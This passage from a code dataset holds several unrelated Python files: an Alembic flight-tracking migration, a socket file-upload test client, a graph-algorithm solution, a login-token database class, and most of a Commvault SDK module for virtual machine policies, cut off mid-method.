20:37:48.513756\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '114aee2ddff4'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('aircraft',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('icao', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('icao')\n )\n op.create_table('flight',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('aircraft_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=8), nullable=True),\n sa.Column('seen', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['aircraft_id'], [u'aircraft.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('flight_position',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('flight_id', sa.Integer(), nullable=False),\n sa.Column('altitude', sa.Integer(), nullable=True),\n sa.Column('latitude', sa.Float(), nullable=True),\n sa.Column('longitude', sa.Float(), nullable=True),\n sa.Column('speed', sa.Integer(), nullable=True),\n sa.Column('track', sa.Integer(), nullable=True),\n sa.Column('vertical_rate', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['flight_id'], [u'flight.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('flight_position')\n op.drop_table('flight')\n op.drop_table('aircraft')\n ### end Alembic commands ###\n","repo_name":"rafaelmartins/sbs1-web","sub_path":"migrations/versions/114aee2ddff4_initial_migration.py","file_name":"114aee2ddff4_initial_migration.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22037871041","text":"import socket\r\nimport struct\r\nimport json\r\nimport os\r\nfrom os.path import join, getsize\r\n\r\n\r\ndef UploadInSocket(filename):\r\n HOST = '192.168.2.109'\r\n PORT = 54321\r\n ADDR = (HOST,PORT)\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n try:\r\n s.connect(ADDR)\r\n except Exception as e:\r\n print(e)\r\n else:\r\n ver = 1\r\n p_type = 0\r\n\r\n cmd_t = 1\r\n pack_no = 0\r\n\r\n\r\n dicJson = {'access_token':'','chapterId':'', 'shareFlag':0,'fileName':'test1.bmp'\r\n ,'remark':''}\r\n dicJson['fileSize'] = getsize(filename)\r\n data_length = dicJson['fileSize']\r\n\r\n js = json.dumps(dicJson).encode('utf8')\r\n sub_len = len(js)\r\n\r\n struct_data = struct.pack('!bbHHHI%ds'%sub_len, ver,p_type,sub_len,cmd_t,pack_no,data_length,js)\r\n print(struct_data)\r\n\r\n s.send(struct_data)\r\n rec = s.recv(1024)\r\n print(rec)\r\n with open(filename, 'rb') as f:\r\n while True:\r\n filedata = f.read(512)\r\n if not filedata:\r\n break\r\n\r\n s.send(filedata)\r\n\r\n\r\nif __name__ == '__main__':\r\n UploadInSocket(r'f:\\test1.bmp')","repo_name":"phantomwhite/SocketTest","sub_path":"TestSocket.py","file_name":"TestSocket.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3727780790","text":"from collections import defaultdict\nclass Solution: \n def topo_sort(self, node):\n if self.color[node] == 1:\n return False\n if self.color[node] == 2: \n return True\n\n self.color[node] = 1 \n for child in self.graph[node]:\n if not self.topo_sort(child):\n return False\n\n self.safe.append(node)\n self.color[node] = 2\n return True\n def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:\n # visited 1 save 2 inital 0\n self.safe = []\n self.color = [0 for i in range(len(graph))]\n 
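# color legend (added comment): 0 = unvisited, 1 = on the current DFS path (possible cycle), 2 = proven safe\n 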
self.graph = graph\n for node in range(len(graph)):\n if self.color[node] == 0:\n self.topo_sort(node)\n self.safe.sort()\n return self.safe\n","repo_name":"zerabruck/Competitive-programming","sub_path":"A2sv/find_eventual_safe_states.py","file_name":"find_eventual_safe_states.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6882513345","text":"import logging\n\nimport psycopg2\nimport uuid\nlogger = logging.getLogger('letSpotify.' + __name__)\n\n\nclass LoginToken:\n def __init__(self, db):\n self.db = db\n\n def check_token(self, data):\n sql = \"SELECT token, login, valid, fid, cookie FROM login_token WHERE token = %s;\"\n result = yield self.db.execute(sql, (data['token'],))\n res = {}\n flag = False\n for i in result.fetchall():\n if i:\n res['token'] = i[0]\n res['login'] = i[1]\n res['valid'] = i[2]\n res['fid'] = i[3]\n res['cookie'] = i[4]\n flag = True\n if not flag:\n return {}, False, \"token not exist\"\n return res, True, \"\"\n\n def create_token(self):\n token = str(uuid.uuid4())\n sql = \"\"\"\n INSERT INTO login_token (token, login, valid, fid)\n VALUES (%s, %s, %s, %s);\n \"\"\"\n try:\n result = yield self.db.execute(sql, (token,\n False,\n False,\n 0,)\n )\n return token, True, \"\"\n except psycopg2.IntegrityError:\n return \"\", False, \"\"\n\n\n def update_token(self, data):\n sql = \"\"\"UPDATE login_token SET (login, valid, fid, cookie) = (%s, %s, %s, %s) WHERE token = %s\"\"\"\n try:\n yield self.db.execute(sql, (data['login'],\n data['valid'],\n data['fid'],\n data['cookie'],\n data['token'],)\n )\n except:\n return False, False, \"\"\n return True, True, \"\"\n","repo_name":"LetSpotify/letspotify-server","sub_path":"lib/login_token.py","file_name":"login_token.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875890663","text":"from __future__ import unicode_literals\n\nfrom .exception import SDKException\nfrom .job import Job\n\n\nclass VirtualMachinePolicies(object):\n \"\"\"Class for representing all the Virtual Machine Policies associated with the Commcell.\"\"\"\n\n def __init__(self, commcell_object):\n \"\"\"Initialize object of the VirtualMachinePolicies class.\n\n Args:\n commcell_object (object) -- instance of the Commcell class\n Returns:\n object - instance of the VirtualMachinePolicies class\n \"\"\"\n self._commcell_object = commcell_object\n\n self._VMPOLICIES_URL = self._commcell_object._services['VM_ALLOCATION_POLICY']\n self._ALL_VMPOLICIES_URL = self._commcell_object._services['ALL_VM_ALLOCATION_POLICY']\n self._VCLIENTS_URL = self._commcell_object._services['GET_VIRTUAL_CLIENTS']\n self._QOPERATION_URL = self._commcell_object._services['EXECUTE_QCOMMAND']\n\n self._vm_policies = None\n self.refresh()\n\n def __str__(self):\n \"\"\"Representation string consisting of all virtual machine policies of the commcell.\n\n Returns:\n str - string of all the virtual machine policies associated with the commcell\n \"\"\"\n representation_string = '{:^5}\\t{:^28}'.format('S. 
No.', 'Virtual Machine Policy')\n\n for (index, vm_policy) in enumerate(self._vm_policies):\n sub_str = '{:^5}\\t{:20}\\n'.format(index + 1, vm_policy)\n representation_string += sub_str\n\n return representation_string.strip()\n\n def __repr__(self):\n \"\"\"Representation string for the instance of the Clients class.\"\"\"\n return \"VirtualMachinePolicies class instance for Commcell: '{0}'\".format(\n self._commcell_object.commserv_name)\n\n def _get_vm_policies(self):\n \"\"\"Gets all the virtual machine policies associated to the commcell specified by the\n Commcell object.\n\n Returns:\n dict - consists of all virtual machine policies for the commcell\n {\n \"vm_policy1_name\": {\n \"id\": vm_policy1Id,\n \"policyType\": policyTypeId\n }\n \"vm_policy2_name\": {\n \"id\": vm_policy2Id,\n \"policyType\": policyTypeId\n }\n }\n Raises:\n SDKException:\n if response is empty\n if response is not success\n \"\"\"\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='GET', url=self._ALL_VMPOLICIES_URL)\n\n if flag:\n if response.json() and 'policy' in response.json():\n vm_policies = response.json()['policy']\n\n if vm_policies == []:\n return {}\n\n vm_policies_dict = {}\n\n for vm_policy in vm_policies:\n temp_name = vm_policy['entity']['vmAllocPolicyName'].lower()\n temp_id = str(vm_policy['entity']['vmAllocPolicyId']).lower()\n temp_policy_type = str(vm_policy['entity']['policyType']).lower()\n vm_policies_dict[temp_name] = {\n 'id': temp_id,\n 'policyType': temp_policy_type\n }\n\n return vm_policies_dict\n else:\n return {}\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _set_vclient_and_vcenter_names(self, vm_policy_options, vclient_name):\n \"\"\"Sets the virtualization client name and the vcenter name for the corresponding vclient\n\n Args:\n vm_policy_options -- optional policy paramters passed by user (None if user\n passes nothing\n\n vclient_name -- virtualization client name\n\n Raises:\n SDKException:\n if response is not success\n\n if no virtualization client exists on the Commcell\n\n if virtualization client with given name does not exist on this Commcell\n \"\"\"\n clients = self._commcell_object.clients\n vclient_name_dict = clients._get_virtualization_clients()\n\n if not vclient_name_dict:\n err_msg = 'No virtualization clients exist on this Commcell.'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n if vclient_name in vclient_name_dict:\n vm_policy_options['clientName'] = vclient_name\n # fetching the vcenter from the corresponding instance object\n client = self._commcell_object.clients.get(vm_policy_options['clientName'])\n agent = client.agents.get('Virtual Server')\n instance_keys = next(iter(agent.instances._instances))\n instance = agent.instances.get(instance_keys)\n vm_policy_options['vCenterName'] = instance.server_host_name[0]\n else:\n err_msg = 'Virtualization client \"{0}\" does not exist'.format(vclient_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def _get_proxy_client_json(self, options):\n try:\n id_ = self._commcell_object.clients[options.get(\"proxy_client\")][\"id\"]\n except KeyError:\n return dict()\n return{\n \"clientId\": int(id_),\n \"clientName\": options[\"proxy_client\"]\n }\n\n def _prepare_add_vmpolicy_json_default(self, vm_policy_options):\n \"\"\"Sets values for creating the add policy json\n\n Args:\n vm_policy_options (dict) -- main dict containing vm policy options\n\n 
Returns:\n vm_policy_json (dict) -- json to be passed for add policy POST request\n \"\"\"\n # setting the json values using functions for elements having nested values\n _datacenter = self._get_data_center_json(vm_policy_options)\n _entity = VirtualMachinePolicies._entity_json(vm_policy_options)\n _esxservers = [{\"esxServerName\": esx_server} for esx_server in vm_policy_options.get(\"esxServers\", \"\")]\n _datastores = [{\"dataStoreName\": datastore} for datastore in vm_policy_options.get(\"dataStores\", \"\")]\n _security_associations = VirtualMachinePolicies._security_associations_json(\n vm_policy_options)\n _network_names = VirtualMachinePolicies._network_names_json(vm_policy_options)\n\n _vm_policy_json = {\n 'action': 0, # 0 for add\n 'policy': {\n \"vmNameEditType\": vm_policy_options.get(\"vm_name_edit\", 1),\n \"vmNameEditString\": vm_policy_options.get(\"vm_name_edit_string\", \"Replicated_\"),\n \"createIsolatedNetwork\": False,\n \"isResourceGroupPolicy\": True,\n \"resourcePoolPath\": \"//\",\n \"destinationHyperV\": {\n \"clientId\": int(self._commcell_object.clients[vm_policy_options['clientName']][\"id\"]),\n \"clientName\": vm_policy_options['clientName']\n },\n 'allDataStoresSelected': vm_policy_options.get('allDataStoresSelected', False),\n 'daysRetainUntil': vm_policy_options.get('daysRetainUntil', -1),\n 'migrateVMs': vm_policy_options.get('migrateVMs', False),\n 'senderEmailId': vm_policy_options.get('senderEmailId', ''),\n 'notifyToEmailIds': vm_policy_options.get('notifyToEmailIds', ''),\n 'quotaType': vm_policy_options.get('quotaType', 0),\n 'maxVMQuota': vm_policy_options.get('maxVMQuota', 10),\n 'namingPattern': vm_policy_options.get('namingPattern', ''),\n 'description': vm_policy_options.get('description', ''),\n 'enabled': vm_policy_options.get('enabled', True),\n 'allowRenewals': vm_policy_options.get('allowRenewals', True),\n 'disableSuccessEmail': vm_policy_options.get('disableSuccessEmail', False),\n 'performAutoMigration': vm_policy_options.get('performAutoMigration', False),\n 'allESXServersSelected': vm_policy_options.get('allESXServersSelected', False),\n 'dataCenter': _datacenter,\n 'entity': _entity,\n \"proxyClientEntity\": self._get_proxy_client_json(vm_policy_options),\n \"networkList\": [\n {\n \"destinationNetwork\": vm_policy_options.get(\"destination_network\"),\n \"sourceNetwork\": \"Any Network\"\n }\n ]\n }\n }\n\n # adding the optional values for the json if they exist\n if _esxservers and not _vm_policy_json['policy']['allESXServersSelected']:\n _vm_policy_json['policy']['esxServers'] = _esxservers\n\n if _datastores and not _vm_policy_json['policy']['allDataStoresSelected']:\n _vm_policy_json['policy']['dataStores'] = _datastores\n\n if _network_names:\n _vm_policy_json['policy']['networkNames'] = _network_names\n\n if _security_associations:\n _vm_policy_json['policy']['securityAssociations'] = _security_associations\n\n # setting json values that are specific to a particular policy type\n\n if vm_policy_options[\"policyType\"] == 4: # for Live Mount policy\n self._prepare_add_vmpolicy_json_livemount(vm_policy_options, _vm_policy_json)\n # TODO: future support for Clone from Template policy\n elif vm_policy_options[\"policyType\"] == 0:\n pass\n # TODO: future support for Restore from Backup policy\n else:\n pass\n\n return _vm_policy_json\n\n def _get_data_center_json(self, vm_policy_options):\n \"\"\"Returns value for the datacenter json value in the add policy json\n\n Args:\n vm_policy_options (dict) -- main dict containing vm 
policy options\n\n Returns:\n _datacenter (dict) -- datacenter json to add to vm policy json\n \"\"\"\n client = self._commcell_object.clients.get(vm_policy_options['clientName'])\n vm_policy_options['clientId'] = client.client_id\n agent = client.agents.get('Virtual Server')\n instance_keys = next(iter(agent.instances._instances))\n instance = agent.instances.get(instance_keys)\n vm_policy_options['instanceId'] = instance.instance_id\n\n # self._set_data_center(vm_policy_options)\n _datacenter = {\n 'vCenterName': vm_policy_options['vCenterName'],\n 'instanceEntity': {\n 'clientId': int(vm_policy_options['clientId']),\n 'instanceName': vm_policy_options['clientName'],\n 'instanceId': int(vm_policy_options['instanceId'])\n },\n }\n\n return _datacenter\n\n def _set_data_center(self, vm_policy_options):\n \"\"\"Sets the datacenter name if provided by user, or sets the alphabetically lowest one in\n the vcenter as default\n\n Args:\n vm_policy_options (dict) -- main dict containing vm policy options\n\n Raises:\n SDKException:\n if specified datacenter is not found for the corresponding virtualization\n client\n\n if no datacenter is found for the virtaulization client\n\n if no response is found\n\n if response is not a success\n \"\"\"\n get_datacenter_xml = (\n ''\n ''\n )\n response_json = self._commcell_object._qoperation_execute(request_xml=get_datacenter_xml)\n\n if 'dataCenterList' in response_json:\n all_nodes = response_json['dataCenterList']\n datacenter_dict = {}\n for node in all_nodes:\n if node['vCenterName'] == vm_policy_options['vCenterName']:\n datacenter_dict[node['dataCenterName']] = node['dataCenterId']\n if 'dataCenterName' in vm_policy_options:\n if vm_policy_options['dataCenterName'] in datacenter_dict:\n vm_policy_options['dataCenterId'] = datacenter_dict[\n vm_policy_options['dataCenterName']]\n else:\n # if no datacenter is found for the vclient, throw error\n err_msg = (\n 'No datacenter found with name: {0} in virtual client: {1}'.format(\n vm_policy_options['dataCenterName'],\n vm_policy_options['clientName'])\n )\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n vm_policy_options['dataCenterName'] = next(iter(datacenter_dict))\n vm_policy_options['dataCenterId'] = datacenter_dict[vm_policy_options[\n 'dataCenterName']]\n else:\n # if no datacenter is found for the vclient, throw error\n err_msg = ('No datacenter found for virtual client: {0}'.format(\n vm_policy_options['clientName']))\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def _clone_vm_policy(self, vm_policy_json):\n \"\"\"Private method to clone a vm policy from VirtualMachinePolicy object\n\n Args:\n vm_policy_json -- dict containing information to clone a particular policy\n along with optional information passed by user\n Returns:\n object -- VirtualMachinePolicy object of the newly cloned policy\n\n Raises:\n SDKException:\n if failed to create vm policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='POST', url=self._ALL_VMPOLICIES_URL, payload=vm_policy_json)\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to create virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n\n raise SDKException('Virtual Machine', '102', o_str)\n # return object of VirtualMachinePolicy if there is no error in response\n 
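# (added comment) refresh the cached policy list so the newly created policy is visible to later lookups\n 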
self.refresh()\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_json['policy']['entity']['vmAllocPolicyName'],\n int(vm_policy_json['policy']['entity']['policyType']),\n int(self._vm_policies[vm_policy_json['policy']['entity']\n ['vmAllocPolicyName']]['id'])\n )\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _prepare_add_vmpolicy_json_livemount(self, vm_policy_options, _vm_policy_json):\n \"\"\"Sets values for creating the add policy json that are specific for creating Live Mount\n policy.\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n _vm_policy_json (dict) -- vm policy json to which Live Mount policy specific\n information is added\n \"\"\"\n _media_agent_json = self._media_agent_json(vm_policy_options)\n\n _vm_policy_json['policy']['minutesRetainUntil'] = vm_policy_options.get(\n 'minutesRetainUntil', 1)\n\n _vm_policy_json['policy']['mediaAgent'] = _media_agent_json\n\n @staticmethod\n def _security_associations_json(vm_policy_options):\n \"\"\"Returns json for the security associations in the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n \"\"\"\n _users = []\n if 'users' in vm_policy_options:\n # TODO: get user info using REST API. For every user, add user dict to _users\n pass\n else:\n # default - admin\n default_user = {\n \"_type_\": 13,\n \"userGUID\": \"admin\",\n \"userName\": \"admin\",\n \"userId\": 1\n }\n _users.append(default_user)\n\n _usergroups = []\n if 'userGroups' in vm_policy_options:\n # TODO: get usergroups info using REST API. For every userGroup, add corresponding dict\n pass\n\n _security_associations = {}\n if _users:\n _security_associations['users'] = _users\n if _usergroups:\n _security_associations['userGroups'] = _usergroups\n\n return _security_associations\n\n @staticmethod\n def _network_names_json(vm_policy_options):\n \"\"\"Returns list of network names for the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n Returns:\n _network_names (list) -- list of network names (str)\n \"\"\"\n _network_names = []\n if 'networkNames' in vm_policy_options:\n for network in vm_policy_options['networkNames']:\n _network_names.append(network)\n\n return _network_names\n\n def _media_agent_json(self, vm_policy_options):\n \"\"\"Returns json for the media agent json value in the add policy json (only for LM)\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user (optional)\n\n Returns:\n _media_agent_json (dict) -- json containing media agent information if media\n agent info is passed by user\n \"\"\"\n _media_agent_json = {}\n if 'mediaAgent' in vm_policy_options:\n # TODO: there can be only one MA -- validate this (whole vm_policy_options)\n media_agent = vm_policy_options['mediaAgent']\n if not self._commcell_object.media_agents.has_media_agent(media_agent):\n raise SDKException(\n 'Virtual Machine', '102',\n 'No media agent exists \"{0}\" exists in commserv \"{1}\"'.format(\n media_agent, self._commcell_object.commserv_name))\n else:\n _media_agent_json['clientName'] = media_agent\n else: # adding a default media agent for automation\n media_agent_dict = self._commcell_object.media_agents._media_agents\n media_agent = [ma for ma in media_agent_dict][0]\n _media_agent_json['clientName'] = media_agent\n\n return _media_agent_json\n\n @staticmethod\n def 
_entity_json(vm_policy_options):\n \"\"\"Returns json for the entity attribute in the add policy json\n\n Args:\n vm_policy_options (dict) -- vm policy options provided by user\n\n Returns:\n _entity (dict) -- json for the entity attribute in add policy json\n \"\"\"\n _entity = {\n 'vmAllocPolicyName': vm_policy_options['vmAllocPolicyName'],\n '_type_': 93, # hardcoded\n 'policyType': vm_policy_options[\"policyType\"],\n 'region': {},\n }\n\n return _entity\n\n def has_policy(self, vm_policy_name):\n \"\"\"Checks if a Virtual Machine policy exists with the given name\n\n Args:\n policy_name (str) -- name of the vm policy\n\n Returns:\n bool - boolean output whether the vm policy exists in the commcell or not\n\n Raises:\n SDKException:\n if type of the vm policy name argument is not string\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n return (self._vm_policies and\n vm_policy_name.lower() in self._vm_policies)\n\n def get(self, vm_policy_name):\n \"\"\"Returns a VirtualMachinePolicy object of the specified virtual machine policy name.\n\n Args:\n vm_policy_name (str) -- name of the virtual machine policy\n\n Returns:\n object - instance of the VirtualMachinePolicy class for the given policy name\n\n Raises:\n SDKException:\n if type of the virtual machine policy name argument is not string\n if no virtual machine policy exists with the given name\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n vm_policy_name = vm_policy_name.lower()\n if self.has_policy(vm_policy_name):\n vm_policy_type_id = int(self._vm_policies[vm_policy_name]['policyType'])\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_name=vm_policy_name,\n vm_policy_type_id=vm_policy_type_id,\n vm_policy_id=int(self._vm_policies[vm_policy_name]['id'])\n )\n else:\n raise SDKException(\n 'Virtual Machine',\n '102',\n 'No policy exists with name: {0}'.format(vm_policy_name))\n\n def add(\n self,\n vm_policy_name,\n vm_policy_type,\n vclient_name,\n vm_policy_options=None\n ):\n \"\"\"Adds a new Virtual Machine Policy to the Commcell.\n\n Args:\n vm_policy_name (str) -- name of the new virtual machine policy to add to\n the Commcell instance\n\n vm_policy_type (str) -- type of virtual machine policy to be added\n [\"Live Mount\", \"Clone From Template\",\n \"Restore From Backup\"]\n\n vclient_name (str) -- the name of the virtualization client under which\n vm policy is to be added\n\n vm_policy_options (dict) -- optional dictionary passed by user to create a vm\n policy. 
Allowed key-value pairs and input types\n are given below\n default: None\n\n \"allDataStoresSelected\" (Boolean) : if all data stores are to be selected;\n matters only if migrateVMs is set\n to True,\n \"daysRetainUntil\" (int) : how many days to retain backup until,\n \"migrateVMs\" (Boolean) : migrate to datastore after expiry\n (only for LiveMount),\n \"senderEmailId\" (str) : email id of sender,\n \"minutesRetainUntil\" (int) : how many minutes to retain backup until,\n \"notifyToEmailIds\" (str) : email id's to notify to; multiple\n emails separated by a comma\n \"quotaType\" (int) : number of vm's/live mounts/labs per\n user,\n \"maxVMQuota\" (int) : maximum number of VM quota,\n \"namingPattern\" (str) : naming pattern,\n \"description\" (str) : description of vm policy,\n \"enabled\" (Boolean) : whether vm policy is enabled or not,\n \"allowRenewals\" (Boolean) : whether to allow renewals or not,\n \"disableSuccessEmail\" (Boolean) : send email on successful creation of vm\n policy,\n \"allESXServersSelected\" (Boolean) : select all esx servers in the vcenter,\n \"dataCenterName\" (str) : data center name for vm policy,\n \"dataStores\" list(str) : list of data store names,\n \"esxServers\" list(str) : list of esx server names,\n \"users\" list(str) : list of users (user-names) to add to vm\n policy,\n \"userGroups\" list(str) : list of usergroups (usergroup-names) to\n add to vm policy,\n \"networkNames\" list(str) : list of network names,\n ------------------------ only for Live Mount ------------------------\n \"mediaAgent\" (str) : media agent name for Live Mount,\n \"performAutoMigration\" (Boolean) : automatic migration of vm\n\n Returns:\n object -- object of the corresponding virtual machine policy type\n\n Raises:\n SDKException:\n if type of the vm policy name argument is not string\n\n if type of the vcenter name argument is not string\n\n if type of virtualization client name argument is not string or None\n\n if policy type is not one of the virtual machine policy types as defined\n\n if the type of vm_policy_options is not dict or None\n\n if vm policy already exists with the given name (case insensitive)\n\n if failed to create vm policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n vm_policy_name = vm_policy_name.lower()\n vm_policy_type = vm_policy_type.lower()\n vclient_name = vclient_name.lower()\n _vm_policy_types = {'live mount': 4,\n 'clone from template': 0,\n 'restore from backup': 13}\n self.refresh()\n if (\n not isinstance(vm_policy_name, str)\n or not isinstance(vclient_name, str)\n or not isinstance(vm_policy_options, (dict, type(None)))\n ):\n raise SDKException('Virtual Machine', '101')\n elif vm_policy_type not in _vm_policy_types:\n err_msg = '{0} is not a valid virtual machine policy type.'.format(\n vm_policy_type)\n raise SDKException('Virtual Machine', '102', err_msg)\n elif self.has_policy(vm_policy_name):\n err_msg = 'Virtual Machine Policy \"{0}\" already exists (not case sensitive)'.format(\n vm_policy_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n if not vm_policy_options:\n vm_policy_options = {}\n vm_policy_options['vmAllocPolicyName'] = vm_policy_name.lower()\n\n # setting the vclient name, vcenter name and policy type\n self._set_vclient_and_vcenter_names(vm_policy_options, vclient_name)\n vm_policy_options['policyType'] = _vm_policy_types[vm_policy_type]\n\n # preparing the json values for adding the new policy\n _vm_policy_json = self._prepare_add_vmpolicy_json_default(vm_policy_options)\n\n # 
passing the built json to create the vm policy\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='POST', url=self._VMPOLICIES_URL, payload=_vm_policy_json)\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to create virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n raise SDKException('Virtual Machine', '102', o_str)\n # returning object of VirtualMachinePolicy if there is no error in response\n self.refresh()\n return VirtualMachinePolicy(\n self._commcell_object,\n vm_policy_name=vm_policy_options['vmAllocPolicyName'],\n vm_policy_type_id=int(vm_policy_options['policyType']),\n vm_policy_id=int(self._vm_policies[vm_policy_name]['id']))\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def delete(self, vm_policy_name):\n \"\"\"Deletes the specified virtual machine policy from the commcell.\n\n Args:\n vm_policy_name (str) -- name of the virtual machine policy to delete\n\n Raises:\n SDKException:\n if type of the virtual machine policy name argument is not string\n\n if failed to delete virtual machine policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n if not isinstance(vm_policy_name, str):\n raise SDKException('Virtual Machine', '101')\n\n if self.has_policy(vm_policy_name):\n # retrieving the corresponding policy id for API call\n vm_policy_id = self._get_vm_policies()[vm_policy_name]['id']\n policy_delete_url = self._VMPOLICIES_URL + '/{0}'.format(vm_policy_id)\n\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n 'DELETE', policy_delete_url)\n\n if flag:\n try:\n if response.json():\n if 'errorCode' in response.json() and 'errorMessage' in response.json():\n error_message = response.json()['errorMessage']\n output_string = 'Failed to delete virtual machine policy\\nError: \"{0}\"'\n raise SDKException(\n 'Virtual Machine', '102', output_string.format(error_message))\n except ValueError:\n if response.text:\n self.refresh()\n return response.text.strip()\n else:\n raise SDKException('Response', '102')\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n else:\n raise SDKException(\n 'Virtual Machine',\n '102',\n 'No policy exists with name: {0}'.format(vm_policy_name))\n\n def refresh(self):\n \"\"\"Refresh the Virtual Machine policies.\"\"\"\n self._vm_policies = self._get_vm_policies()\n\n\nclass VirtualMachinePolicy(object):\n \"\"\"Class for representing a single Virtual Machine Policy. 
Contains method definitions for\n common operations among all VM Policies\"\"\"\n\n def __new__(\n cls,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Decides which instance object needs to be created\"\"\"\n if vm_policy_type_id == 4 or vm_policy_type_id == 2: # for 'Live Mount'\n return object.__new__(LiveMountPolicy)\n # TODO: future support for 'Clone From Template'\n elif vm_policy_type_id == 6:\n return object.__new__(VirtualMachinePolicy)\n # TODO: future support for 'Restore From Backup'\n else:\n return object.__new__(VirtualMachinePolicy)\n\n def __init__(\n self,\n commcell_object,\n vm_policy_name,\n vm_policy_type_id,\n vm_policy_id=None\n ):\n \"\"\"Initialize object of the VirtualMachinePolicy class.\n\n Args:\n commcell_object (object) -- instance of the Commcell class\n vm_policy_name (str) -- name of the vm policy to be created\n vm_policy_type_id (int) -- type of policy (integer code for vm policy)\n vm_policy_id (int) -- vm policy id if available (optional)\n\n Returns:\n object -- instance of the VirtualMachinePolicy class\n \"\"\"\n self._commcell_object = commcell_object\n self._vm_policy_name = vm_policy_name\n self._vm_policy_type_id = vm_policy_type_id\n\n if vm_policy_id:\n self._vm_policy_id = str(vm_policy_id)\n else:\n self._vm_policy_id = self._get_vm_policy_id()\n\n self._VM_POLICY_URL = (self._commcell_object._services['GET_VM_ALLOCATION_POLICY']\n % self._vm_policy_id)\n\n self._vm_policy_properties = None\n self.refresh()\n\n def __repr__(self):\n \"\"\"Representation string for the instance of this class.\"\"\"\n return (\"VirtualMachinePolicy class instance for Virtual Machine Policy: '{0}' for \"\n \"Commcell: '{1}'\".format(self.vm_policy_name, self._commcell_object.commserv_name))\n\n def _get_vm_policy_id(self):\n \"\"\"Gets the virtual machine policy id associated with the svirtual machine policy\"\"\"\n vm_policies = VirtualMachinePolicies(self._commcell_object)\n return vm_policies.get(self.vm_policy_name).vm_policy_id\n\n def _get_vm_policy_properties(self):\n \"\"\"Gets the properties of the virtual machine policy.\n\n Returns:\n dict -- dictionary consisting of the properties of this vm policy\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n \"\"\"\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'GET', self._VM_POLICY_URL\n )\n\n if flag:\n if response.json()['policy'][0]: # API returns an array with one element\n return response.json()['policy'][0]\n else:\n raise SDKException('Response', 102)\n else:\n response_str = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', 101, response_str)\n\n def _update_vm_policy(self):\n \"\"\"Updates the vm policy using a PUT request with the updated properties json.\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n \"\"\"\n update_policy_json = {\n 'action': 1, # action 1 for PUT\n 'policy': self._vm_policy_properties\n }\n\n flag, response = self._commcell_object._cvpysdk_object.make_request(\n 'PUT', self._VM_POLICY_URL, update_policy_json\n )\n\n self.refresh()\n\n if flag:\n if response.json():\n if 'error' in response.json():\n if response.json()['error']['errorCode'] != 0:\n error_message = response.json()['error']['errorMessage']\n o_str = 'Failed to update virtual machine policy\\nError: \"{0}\"'.format(\n error_message)\n raise SDKException('Virtual Machine', '102', 